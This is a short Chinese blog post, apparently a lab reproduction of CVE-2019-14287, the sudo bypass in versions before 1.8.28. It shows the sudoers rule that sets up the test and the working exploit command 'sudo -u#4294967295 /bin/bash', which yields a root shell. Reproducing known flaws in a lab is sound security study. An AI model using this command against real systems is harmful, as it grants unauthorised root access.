(CVE-2019-14287)-linux sudo root 权限绕过漏洞复现

Linux 2020-10-08

1：查看测试机sudo版本号，确认是受影响版本。

$file://c:\users\sz\appdata\local\temp\tmpntilbq\1.png$

2：创建账号test

$file://c:\users\sz\appdata\local\temp\tmpntilbq\2.png$

3：进入/etc,备份一下sudoers到/root，然后修改sudoers内容，添加：

test ALL=(ALL,!root) /bin/bash

$file://c:\users\sz\appdata\local\temp\tmpntilbq\3.png$

$file://c:\users\sz\appdata\local\temp\tmpntilbq\4.png$

$file://c:\users\sz\appdata\local\temp\tmpntilbq\5.png$

4：登录test账号，

$file://c:\users\sz\appdata\local\temp\tmpntilbq\6.png$

sudo -u#4294967295 /bin/bash

受影响的Sudo版本：

1.8.28之前的Sudo版本会受到影响。

=======================================
参考链接：
https://www.sudo.ws/alerts/minus_1_uid.html
https://mp.weixin.qq.com/s/bb6Hd3JdYiLilqdP_-INtA
https://mp.weixin.qq.com/s/1-WQSiB1Yc_sPYh928TXkw

相关文章

Linux系统控制文件 /etc/sysctl.conf详解

/etc/sysctl.conf这个目录主要是配置一些系统信息，/etc/sys...

linux命令useradd添加用户详解

1.作用 useradd或adduser命令用来建立用户帐号和创建用户的起...

vi 和vim 的区别

它们都是多模式编辑器，不同的是vim 是vi的升级版本，它不仅...

Linux系统下如何监测磁盘的使用空间

不管是我们在安装软件还是监测软件的使用性能，我们都要随时...

linux中查看和开放端口

装好Tomcat7后，发现除了本机能访问外界访问不了，岂有此理。...

Linux设置开放一个端口

修改防火墙配置需要修改 /etc/sysconfig/iptables 这个文件，...